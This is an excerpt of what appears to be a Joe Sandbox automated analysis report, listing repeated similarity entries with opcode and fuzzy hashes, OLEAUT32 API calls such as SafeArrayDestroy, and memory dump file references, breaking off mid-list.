                                            Similarity
                                            • API ID: ArrayDestroySafe
                                            • String ID:
                                            • API String ID: 4225690600-0
                                            • Opcode ID: 49ac1cfcc5cdf21892005add17ce214d39069a9e1d2be20f066c96bf68d3be45
                                            • Instruction ID: 3a9f490568c71afbd202a704f738c77a890a29f65a196be7b6b4cc41320b7fad
                                            • Opcode Fuzzy Hash: 49ac1cfcc5cdf21892005add17ce214d39069a9e1d2be20f066c96bf68d3be45
                                            • Instruction Fuzzy Hash: F6415B74E006189FDB01DF68CC80B6EB7FDAF89214FA0859AE529E7255C731E980CF50
                                            APIs
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 689623B3
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 689623C3
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 689623D6
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 689623E9
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 689623FC
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896240F
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: ArrayDestroySafe
                                            • String ID:
                                            • API String ID: 4225690600-0
                                            • Opcode ID: 49ac1cfcc5cdf21892005add17ce214d39069a9e1d2be20f066c96bf68d3be45
                                            • Instruction ID: 210759e3eea7412e921404d681e3d9d80f3e7fc209c7086984fd392b9bebd6ae
                                            • Opcode Fuzzy Hash: 49ac1cfcc5cdf21892005add17ce214d39069a9e1d2be20f066c96bf68d3be45
                                            • Instruction Fuzzy Hash: 53415D74A006099FDB00DFA9CC80F6DB7FDAF89214F60859AE518EB251D771E981CF50
                                            APIs
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AE63
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AE73
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AE86
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AE99
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AEAC
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AEBF
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: ArrayDestroySafe
                                            • String ID:
                                            • API String ID: 4225690600-0
                                            • Opcode ID: 02b64e95c376b59648da14796405387add3a9fb2f25177fd787919d8d28b483c
                                            • Instruction ID: 1821df71bd6de1e98179274eb5589c546f53690de35da28a86aeee068db3fc2a
                                            • Opcode Fuzzy Hash: 02b64e95c376b59648da14796405387add3a9fb2f25177fd787919d8d28b483c
                                            • Instruction Fuzzy Hash: EB312774E006189FEB11DBA8CC80B6EB7FDAF89214F60858AE429E7255C775E980CF50
                                            APIs
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AE63
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AE73
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AE86
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AE99
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AEAC
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AEBF
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: ArrayDestroySafe
                                            • String ID:
                                            • API String ID: 4225690600-0
                                            • Opcode ID: 07364076eea1c3a52dd7b0c5b80a9f10c4265379c2405238c7f8ac1b24fc7f1c
                                            • Instruction ID: 431c43769665f1da9e3f856e586384d242175837328573cb00d1cbafcfc5751a
                                            • Opcode Fuzzy Hash: 07364076eea1c3a52dd7b0c5b80a9f10c4265379c2405238c7f8ac1b24fc7f1c
                                            • Instruction Fuzzy Hash: 68313974E006189FDB11CFA8CD80B6EB7FDAF99214F608696E429E7255C771E980CF50
                                            APIs
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AE63
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AE73
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AE86
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AE99
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AEAC
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AEBF
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: ArrayDestroySafe
                                            • String ID:
                                            • API String ID: 4225690600-0
                                            • Opcode ID: b93e90fafea2d1a1e1621e5c5a56d1e65c48d5202d7ef6dd7155e1a863833f25
                                            • Instruction ID: b71ab536ea88e3618275ccc1629de9cd38c19560f284e433eb7693acc750f2cd
                                            • Opcode Fuzzy Hash: b93e90fafea2d1a1e1621e5c5a56d1e65c48d5202d7ef6dd7155e1a863833f25
                                            • Instruction Fuzzy Hash: 6F314B70E006189FDB01CF68CC80B6EB7FDAF89214F608586E529E7241C775E981CF50
                                            APIs
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 689623B3
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 689623C3
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 689623D6
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 689623E9
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 689623FC
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896240F
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: ArrayDestroySafe
                                            • String ID:
                                            • API String ID: 4225690600-0
                                            • Opcode ID: b93e90fafea2d1a1e1621e5c5a56d1e65c48d5202d7ef6dd7155e1a863833f25
                                            • Instruction ID: ffef9586cba6ca6a55b7b8f31c7f1e68f849042f9e2e758a22ad0258f1a02dc1
                                            • Opcode Fuzzy Hash: b93e90fafea2d1a1e1621e5c5a56d1e65c48d5202d7ef6dd7155e1a863833f25
                                            • Instruction Fuzzy Hash: A3313970A006089FDB10DFA9CC80B6EB7BDAF89714F60858AE518EB251DB71E9818F50
                                            APIs
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 689623B3
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 689623C3
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 689623D6
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 689623E9
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 689623FC
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896240F
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: ArrayDestroySafe
                                            • String ID:
                                            • API String ID: 4225690600-0
                                            • Opcode ID: 9312333f4209e48847c73630b7938236ab6bdce3f96115d1842b00735ffaa758
                                            • Instruction ID: cd73d41c341b82242191cd1c547bad15525ea4b12d0aa094afaa7b10aa1bd7d4
                                            • Opcode Fuzzy Hash: 9312333f4209e48847c73630b7938236ab6bdce3f96115d1842b00735ffaa758
                                            • Instruction Fuzzy Hash: 393128B4A006189FDB00DBA9CD80B6DB7FDAF99214F60859AE518EB251D771E980CF50
                                            APIs
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 689623B3
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 689623C3
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 689623D6
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 689623E9
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 689623FC
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896240F
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: ArrayDestroySafe
                                            • String ID:
                                            • API String ID: 4225690600-0
                                            • Opcode ID: 77952365b826e7e386f519eaa9a8d63d1ba55f4e763dbdcfdab57c31556c2948
                                            • Instruction ID: 611f143ec854ddcad5c3def315ec212e50de0f76bdb6f9e3078d7449bcb0f73e
                                            • Opcode Fuzzy Hash: 77952365b826e7e386f519eaa9a8d63d1ba55f4e763dbdcfdab57c31556c2948
                                            • Instruction Fuzzy Hash: 6F313C74A006199FDB00DFA9CD80B6DB7FDAF89314F60859AE518EB251CB71D980CF50
                                            APIs
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AE63
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AE73
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AE86
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AE99
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AEAC
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AEBF
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: ArrayDestroySafe
                                            • String ID:
                                            • API String ID: 4225690600-0
                                            • Opcode ID: 9312333f4209e48847c73630b7938236ab6bdce3f96115d1842b00735ffaa758
                                            • Instruction ID: 943568b776b23e322ee71fbdd7c504dcfd59f4719acee0bf1d9cc8016b895ed1
                                            • Opcode Fuzzy Hash: 9312333f4209e48847c73630b7938236ab6bdce3f96115d1842b00735ffaa758
                                            • Instruction Fuzzy Hash: F6314874E006189FDB01CBA8CD80B6EB7FDAF89214F60858AE529E7245D731ED80CF50
                                            APIs
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AE63
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AE73
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AE86
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AE99
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AEAC
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AEBF
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: ArrayDestroySafe
                                            • String ID:
                                            • API String ID: 4225690600-0
                                            • Opcode ID: 15bcee82584ddef1bc5da76bfcaab540597d7e1bc81ab99fad4b880ad3c92c0a
                                            • Instruction ID: 6060eb493262671ee27b563d04b5cd4b22c9d9164445095b4cfb8ca1abf9061f
                                            • Opcode Fuzzy Hash: 15bcee82584ddef1bc5da76bfcaab540597d7e1bc81ab99fad4b880ad3c92c0a
                                            • Instruction Fuzzy Hash: D1314970E006189FDB01CFA8CD80B6EB7FDAF89214F608586E529E7241C735E980CF50
                                            APIs
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AE63
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AE73
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AE86
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AE99
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AEAC
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AEBF
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: ArrayDestroySafe
                                            • String ID:
                                            • API String ID: 4225690600-0
                                            • Opcode ID: 77952365b826e7e386f519eaa9a8d63d1ba55f4e763dbdcfdab57c31556c2948
                                            • Instruction ID: 9b5026204d4b6d19ccec61a1eced222b88d6c246f689c638958bfbd0c05f994e
                                            • Opcode Fuzzy Hash: 77952365b826e7e386f519eaa9a8d63d1ba55f4e763dbdcfdab57c31556c2948
                                            • Instruction Fuzzy Hash: A1314974E006189FDB01CF68CD80B6EB7FDAF89214FA0859AE529E7241CB71E980CF50
                                            APIs
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AE63
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AE73
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AE86
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AE99
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AEAC
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AEBF
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: ArrayDestroySafe
                                            • String ID:
                                            • API String ID: 4225690600-0
                                            • Opcode ID: 59248ffaa30527e2a4661330ba46d9ea5d5b92b5c7f2a2342c148e3c69a9ae5c
                                            • Instruction ID: 824c043d3e75fb1d9b04741e2877e6f6ad1083b52672c84a602518b4709e878b
                                            • Opcode Fuzzy Hash: 59248ffaa30527e2a4661330ba46d9ea5d5b92b5c7f2a2342c148e3c69a9ae5c
                                            • Instruction Fuzzy Hash: 6C314870E006189FDB01CBA8CC80B6EB7FDAF89214FA0858AE429E7251C731ED80CF50
                                            APIs
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AE63
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AE73
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AE86
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AE99
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AEAC
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896AEBF
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: ArrayDestroySafe
                                            • String ID:
                                            • API String ID: 4225690600-0
                                            • Opcode ID: 7f6f487e9c29fcea4c91a247c6c7c3f82584b9b5cce55ecbf5a7a4fd31f0f1bc
                                            • Instruction ID: f8df9a2d03d7db677b454f59ec2d6cc98ac85d86a01d5743f5dfe838f8ccec9c
                                            • Opcode Fuzzy Hash: 7f6f487e9c29fcea4c91a247c6c7c3f82584b9b5cce55ecbf5a7a4fd31f0f1bc
                                            • Instruction Fuzzy Hash: 35314874E006189FDB01DBA8CD80B5EB7FDAF89214F608586E429E7241C771E980CF50
                                            APIs
                                            • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6896C180
                                            • SafeArrayPutElement.OLEAUT32(00000000,68963749,?), ref: 6896C1B8
                                            • VariantClear.OLEAUT32(?), ref: 6896C1C4
                                            • VariantCopy.OLEAUT32(68963749,?), ref: 6896C21B
                                            • VariantClear.OLEAUT32(?), ref: 6896C22F
                                            • SafeArrayDestroy.OLEAUT32(00000000), ref: 6896C23E
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
